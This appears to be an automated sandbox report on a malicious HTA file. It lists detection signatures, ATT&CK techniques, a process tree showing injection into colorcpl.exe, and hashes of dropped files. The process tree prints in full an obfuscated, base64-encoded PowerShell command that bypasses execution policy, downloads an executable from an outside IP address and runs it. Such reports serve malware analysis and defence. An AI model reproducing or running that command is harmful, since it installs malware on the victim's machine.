64a9d75dd5248c5dea25ed825506581b99821e0bd26a8f8efa88c5cadab7917d

Analysis

max time kernel
143s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
13/07/2023, 08:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

hcl_net.hta
Size

3KB
MD5

9c166b7c49e30a25ba012cee1095f95c
SHA1

27dff755c058dfc8b3a3ee3069d896f3c7a06a91
SHA256

64a9d75dd5248c5dea25ed825506581b99821e0bd26a8f8efa88c5cadab7917d
SHA512

df6cdd20fb26d83ebd600d8d5863a2fb843c729404c8f83152d81b2da0d73ba97c74b3d3246f078db0ae25c20bf10256a3f2e6f0dc17d3f33fe9ccb27d69e37d

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
9	892	powershell.exe
56	2808	mshta.exe

Downloads MZ/PE file

Checks QEMU agent file 2 TTPs 2 IoCs

Checks presence of QEMU agent, possibly to detect virtualization.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	HCL_Cento.exe
File opened (read-only)	C:\Program Files\Qemu-ga\qemu-ga.exe	HCL_Cento.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1722984668-1829624581-3022101259-1000\Control Panel\International\Geo\Nation	HCL_Cento.exe

Executes dropped EXE 1 IoCs

pid	Process
560	HCL_Cento.exe

Loads dropped DLL 2 IoCs

pid	Process
560	HCL_Cento.exe
1584	HCL_Cento.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{75F51C47-0978-442D-A25C-33091214169F}.catalogItem	svchost.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1584	HCL_Cento.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
560	HCL_Cento.exe
1584	HCL_Cento.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 560 set thread context of 1584	560	HCL_Cento.exe	100
PID 1584 set thread context of 2808	1584	HCL_Cento.exe	68
PID 2204 set thread context of 2808	2204	colorcpl.exe	68

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3812	4000	WerFault.exe	102

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\Registry\User\S-1-5-21-1722984668-1829624581-3022101259-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2	colorcpl.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

pid	Process
3672	pOweRSHell.EXe
3672	pOweRSHell.EXe
892	powershell.exe
892	powershell.exe
1584	HCL_Cento.exe
1584	HCL_Cento.exe
1584	HCL_Cento.exe
1584	HCL_Cento.exe
1584	HCL_Cento.exe
1584	HCL_Cento.exe
1584	HCL_Cento.exe
1584	HCL_Cento.exe
2204	colorcpl.exe
2204	colorcpl.exe
2204	colorcpl.exe
2204	colorcpl.exe
2204	colorcpl.exe
2204	colorcpl.exe
2204	colorcpl.exe
2204	colorcpl.exe

Suspicious behavior: MapViewOfSection 8 IoCs

pid	Process
560	HCL_Cento.exe
1584	HCL_Cento.exe
1584	HCL_Cento.exe
1584	HCL_Cento.exe
2204	colorcpl.exe
2204	colorcpl.exe
2204	colorcpl.exe
2204	colorcpl.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	3672	pOweRSHell.EXe
Token: SeDebugPrivilege	892	powershell.exe
Token: SeDebugPrivilege	1584	HCL_Cento.exe
Token: SeDebugPrivilege	2204	colorcpl.exe

Suspicious use of WriteProcessMemory 19 IoCs

description	pid	Process	procid_target
PID 2808 wrote to memory of 3672	2808	mshta.exe	81
PID 2808 wrote to memory of 3672	2808	mshta.exe	81
PID 2808 wrote to memory of 3672	2808	mshta.exe	81
PID 3672 wrote to memory of 892	3672	pOweRSHell.EXe	85
PID 3672 wrote to memory of 892	3672	pOweRSHell.EXe	85
PID 3672 wrote to memory of 892	3672	pOweRSHell.EXe	85
PID 892 wrote to memory of 560	892	powershell.exe	89
PID 892 wrote to memory of 560	892	powershell.exe	89
PID 892 wrote to memory of 560	892	powershell.exe	89
PID 560 wrote to memory of 1584	560	HCL_Cento.exe	100
PID 560 wrote to memory of 1584	560	HCL_Cento.exe	100
PID 560 wrote to memory of 1584	560	HCL_Cento.exe	100
PID 560 wrote to memory of 1584	560	HCL_Cento.exe	100
PID 2808 wrote to memory of 2204	2808	mshta.exe	101
PID 2808 wrote to memory of 2204	2808	mshta.exe	101
PID 2808 wrote to memory of 2204	2808	mshta.exe	101
PID 2204 wrote to memory of 4000	2204	colorcpl.exe	102
PID 2204 wrote to memory of 4000	2204	colorcpl.exe	102
PID 2204 wrote to memory of 4000	2204	colorcpl.exe	102

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\hcl_net.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2808
- C:\Windows\SysWOW64\wINdOwspoWershELL\v1.0\pOweRSHell.EXe
  "C:\Windows\sysTEm32\wINdOwspoWershELL\v1.0\pOweRSHell.EXe" "PowErSHell.ExE -eX byPaSS -Nop -W 1 -Ec IAAJAFsATgBFAFQALgBTAGUAUgB2AEkAYwBFAHAAbwBpAG4AVABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAFUAcgBJAHQAeQBQAFIATwBUAE8AQwBPAGwAIAAgACAAIAAgACAACQAJACAACQA9ACAAIAAJACAACQAJAAkAIAAgAAkAIAAgAAkAIABbAE4AZQBUAC4AUwBFAGMAVQByAEkAdABZAHAAUgBvAFQAbwBjAE8AbABUAHkAUABlAF0AOgA6AFQAbABzADEAMgAgACAAIAAgACAAIAAgACAAOwAgACAAIAAgACAAIAAgACAAIAAgACAACQAJAAkACQAJAHcARwBlAHQAIAAJAAkACQAJAAkAKAAdIGgAdAB0AHAAOgAvAC8AMQA5ADIALgAzAC4AMgA0ADMALgAxADUANwAvADUAMgAwAC8AdwBpAB0gIAAJAAkACQAJACAACQAJAAkACQArACAACQAJAAkACQAdIG4AZAAuAGUAeABlAB0gIAAJAAkACQAJACkAIAAJAAkACQAJAAkACQAtAG8AVQB0AGYAaQBsAGUAIAAJAAkACQAJAAkACQAdICQAZQBuAFYAOgB0AGUAbQBwAFwASABDAEwAXwBDAGUAbgB0AG8ALgBlAHgAZQAdICAACQAgAAkAIAAgADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHMAVABhAHIAdAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAdICQAZQBuAHYAOgB0AEUAbQBQAFwASABDAEwAXwBDAGUAbgB0AG8ALgBlAHgAZQAdIA== "
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3672
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPaSS -Nop -W 1 -Ec IAAJAFsATgBFAFQALgBTAGUAUgB2AEkAYwBFAHAAbwBpAG4AVABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBjAFUAcgBJAHQAeQBQAFIATwBUAE8AQwBPAGwAIAAgACAAIAAgACAACQAJACAACQA9ACAAIAAJACAACQAJAAkAIAAgAAkAIAAgAAkAIABbAE4AZQBUAC4AUwBFAGMAVQByAEkAdABZAHAAUgBvAFQAbwBjAE8AbABUAHkAUABlAF0AOgA6AFQAbABzADEAMgAgACAAIAAgACAAIAAgACAAOwAgACAAIAAgACAAIAAgACAAIAAgACAACQAJAAkACQAJAHcARwBlAHQAIAAJAAkACQAJAAkAKAAdIGgAdAB0AHAAOgAvAC8AMQA5ADIALgAzAC4AMgA0ADMALgAxADUANwAvADUAMgAwAC8AdwBpAB0gIAAJAAkACQAJACAACQAJAAkACQArACAACQAJAAkACQAdIG4AZAAuAGUAeABlAB0gIAAJAAkACQAJACkAIAAJAAkACQAJAAkACQAtAG8AVQB0AGYAaQBsAGUAIAAJAAkACQAJAAkACQAdICQAZQBuAFYAOgB0AGUAbQBwAFwASABDAEwAXwBDAGUAbgB0AG8ALgBlAHgAZQAdICAACQAgAAkAIAAgADsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHMAVABhAHIAdAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAdICQAZQBuAHYAOgB0AEUAbQBQAFwASABDAEwAXwBDAGUAbgB0AG8ALgBlAHgAZQAdIA==
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:892
  - - C:\Users\Admin\AppData\Local\Temp\HCL_Cento.exe
      "C:\Users\Admin\AppData\Local\Temp\HCL_Cento.exe"
      4⤵
      Checks QEMU agent file
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: MapViewOfSection
      Suspicious use of WriteProcessMemory
      PID:560
    - - C:\Users\Admin\AppData\Local\Temp\HCL_Cento.exe
        
        "C:\Users\Admin\AppData\Local\Temp\HCL_Cento.exe"
        5⤵
        Checks QEMU agent file
        Checks computer location settings
        Loads dropped DLL
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        Suspicious use of AdjustPrivilegeToken
        
        PID:1584
- C:\Windows\SysWOW64\colorcpl.exe
  "C:\Windows\SysWOW64\colorcpl.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2204
- - C:\Program Files\Mozilla Firefox\Firefox.exe
    "C:\Program Files\Mozilla Firefox\Firefox.exe"
    3⤵
    PID:4000
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 4000 -s 136
      4⤵
      Program crash
      PID:3812

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
- Drops file in System32 directory
PID:3828

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 440 -p 4000 -ip 4000
1⤵
PID:4432

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOweRSHell.EXe.log

Filesize
2KB

MD5
25604a2821749d30ca35877a7669dff9

SHA1
49c624275363c7b6768452db6868f8100aa967be

SHA256
7f036b1837d205690b992027eb8b81939ba0228fc296d3f30039eeba00bd4476

SHA512
206d70af0b332208ace2565699f5b5da82b6a3806ffa51dd05f16ab568a887d63449da79bbaeb46183038837446a49515d62cb6615e5c5b27563cd5f774b93f5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
11KB

MD5
3a20dd6fd5f3517590cdcef89aad4a8a

SHA1
4079848b703f65223933b16d014a1d5a32878dc6

SHA256
a552c2bbf7ad4c80de1f350e1530d48f394ef75f434c532bf4aa6ff20d5d825d

SHA512
c84ae74a3d69af8a28bd6bae5c23f6e68f5b9cb772f2ceebce571530b9602d9693e5b09360ce068113c454a7ead029c95cf46d593f4f819d0d8f9310b6682b30

Download Submit
C:\Users\Admin\AppData\Local\Temp\HCL_Cento.exe

Filesize
255KB

MD5
df1ef906e321e409ea4c626898cb8a76

SHA1
d3045b73b025fd12fc8a185d37e22e4bb5267550

SHA256
cccce33fbe5368d0d149453811b5f26ebe4a98c596e87e5948d82b7f0805a884

SHA512
ad9cdbb79a803c23a9d4ab073ccddc84f592e066e9341fbf80d34bcdb8b8bb65bd0b17994ba8d886f98925b26ecf0d9f1777641a94997f519ffb131a4da75fde

Download Submit
C:\Users\Admin\AppData\Local\Temp\HCL_Cento.exe

Filesize
255KB

MD5
df1ef906e321e409ea4c626898cb8a76

SHA1
d3045b73b025fd12fc8a185d37e22e4bb5267550

SHA256
cccce33fbe5368d0d149453811b5f26ebe4a98c596e87e5948d82b7f0805a884

SHA512
ad9cdbb79a803c23a9d4ab073ccddc84f592e066e9341fbf80d34bcdb8b8bb65bd0b17994ba8d886f98925b26ecf0d9f1777641a94997f519ffb131a4da75fde

Download Submit
C:\Users\Admin\AppData\Local\Temp\HCL_Cento.exe

Filesize
255KB

MD5
df1ef906e321e409ea4c626898cb8a76

SHA1
d3045b73b025fd12fc8a185d37e22e4bb5267550

SHA256
cccce33fbe5368d0d149453811b5f26ebe4a98c596e87e5948d82b7f0805a884

SHA512
ad9cdbb79a803c23a9d4ab073ccddc84f592e066e9341fbf80d34bcdb8b8bb65bd0b17994ba8d886f98925b26ecf0d9f1777641a94997f519ffb131a4da75fde

Download Submit
C:\Users\Admin\AppData\Local\Temp\HCL_Cento.exe

Filesize
255KB

MD5
df1ef906e321e409ea4c626898cb8a76

SHA1
d3045b73b025fd12fc8a185d37e22e4bb5267550

SHA256
cccce33fbe5368d0d149453811b5f26ebe4a98c596e87e5948d82b7f0805a884

SHA512
ad9cdbb79a803c23a9d4ab073ccddc84f592e066e9341fbf80d34bcdb8b8bb65bd0b17994ba8d886f98925b26ecf0d9f1777641a94997f519ffb131a4da75fde

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qwim0rgb.kfj.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nssD8CE.tmp\System.dll

Filesize
12KB

MD5
0d7ad4f45dc6f5aa87f606d0331c6901

SHA1
48df0911f0484cbe2a8cdd5362140b63c41ee457

SHA256
3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca

SHA512
c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9

Download Submit
memory/560-197-0x00000000715B0000-0x00000000715B7000-memory.dmp

Filesize
28KB

Download
memory/560-196-0x0000000077321000-0x0000000077441000-memory.dmp

Filesize
1.1MB

Download
memory/560-195-0x0000000077321000-0x0000000077441000-memory.dmp

Filesize
1.1MB

Download
memory/892-163-0x0000000006B80000-0x0000000006B9A000-memory.dmp

Filesize
104KB

Download
memory/892-150-0x0000000070D00000-0x00000000714B0000-memory.dmp

Filesize
7.7MB

Download
memory/892-162-0x0000000007FA0000-0x000000000861A000-memory.dmp

Filesize
6.5MB

Download
memory/892-182-0x0000000070D00000-0x00000000714B0000-memory.dmp

Filesize
7.7MB

Download
memory/892-166-0x0000000007C80000-0x0000000007D16000-memory.dmp

Filesize
600KB

Download
memory/892-167-0x0000000007C10000-0x0000000007C32000-memory.dmp

Filesize
136KB

Download
memory/892-168-0x0000000008BD0000-0x0000000009174000-memory.dmp

Filesize
5.6MB

Download
memory/892-161-0x0000000005050000-0x0000000005060000-memory.dmp

Filesize
64KB

Download
memory/892-151-0x0000000005050000-0x0000000005060000-memory.dmp

Filesize
64KB

Download
memory/1584-200-0x00000000773A8000-0x00000000773A9000-memory.dmp

Filesize
4KB

Download
memory/1584-201-0x0000000000400000-0x0000000001654000-memory.dmp

Filesize
18.3MB

Download
memory/1584-215-0x0000000001660000-0x0000000006850000-memory.dmp

Filesize
81.9MB

Download
memory/1584-211-0x0000000000400000-0x0000000001654000-memory.dmp

Filesize
18.3MB

Download
memory/1584-209-0x0000000000400000-0x0000000001654000-memory.dmp

Filesize
18.3MB

Download
memory/1584-208-0x0000000036C40000-0x0000000036F8A000-memory.dmp

Filesize
3.3MB

Download
memory/1584-207-0x0000000000400000-0x0000000001654000-memory.dmp

Filesize
18.3MB

Download
memory/1584-206-0x0000000077321000-0x0000000077441000-memory.dmp

Filesize
1.1MB

Download
memory/1584-205-0x0000000000400000-0x0000000001654000-memory.dmp

Filesize
18.3MB

Download
memory/1584-204-0x0000000000400000-0x0000000001654000-memory.dmp

Filesize
18.3MB

Download
memory/1584-203-0x0000000001660000-0x0000000006850000-memory.dmp

Filesize
81.9MB

Download
memory/1584-199-0x0000000000400000-0x0000000001654000-memory.dmp

Filesize
18.3MB

Download
memory/2204-214-0x0000000000170000-0x000000000019E000-memory.dmp

Filesize
184KB

Download
memory/2204-217-0x0000000000170000-0x000000000019E000-memory.dmp

Filesize
184KB

Download
memory/2204-230-0x0000000002160000-0x00000000021EF000-memory.dmp

Filesize
572KB

Download
memory/2204-216-0x00000000023D0000-0x000000000271A000-memory.dmp

Filesize
3.3MB

Download
memory/2204-213-0x0000000000530000-0x0000000000549000-memory.dmp

Filesize
100KB

Download
memory/2204-212-0x0000000000530000-0x0000000000549000-memory.dmp

Filesize
100KB

Download
memory/2808-220-0x0000000001510000-0x00000000015E9000-memory.dmp

Filesize
868KB

Download
memory/2808-223-0x0000000001510000-0x00000000015E9000-memory.dmp

Filesize
868KB

Download
memory/2808-221-0x0000000001510000-0x00000000015E9000-memory.dmp

Filesize
868KB

Download
memory/2808-210-0x0000000001420000-0x000000000150A000-memory.dmp

Filesize
936KB

Download
memory/3672-136-0x00000000051C0000-0x00000000057E8000-memory.dmp

Filesize
6.2MB

Download
memory/3672-137-0x0000000004EA0000-0x0000000004EC2000-memory.dmp

Filesize
136KB

Download
memory/3672-138-0x0000000005040000-0x00000000050A6000-memory.dmp

Filesize
408KB

Download
memory/3672-178-0x0000000004B80000-0x0000000004B90000-memory.dmp

Filesize
64KB

Download
memory/3672-135-0x0000000004B80000-0x0000000004B90000-memory.dmp

Filesize
64KB

Download
memory/3672-164-0x0000000070D00000-0x00000000714B0000-memory.dmp

Filesize
7.7MB

Download
memory/3672-134-0x0000000070D00000-0x00000000714B0000-memory.dmp

Filesize
7.7MB

Download
memory/3672-149-0x0000000005E70000-0x0000000005E8E000-memory.dmp

Filesize
120KB

Download
memory/3672-139-0x00000000057F0000-0x0000000005856000-memory.dmp

Filesize
408KB

Download
memory/3672-189-0x0000000070D00000-0x00000000714B0000-memory.dmp

Filesize
7.7MB

Download
memory/3672-133-0x0000000002520000-0x0000000002556000-memory.dmp

Filesize
216KB

Download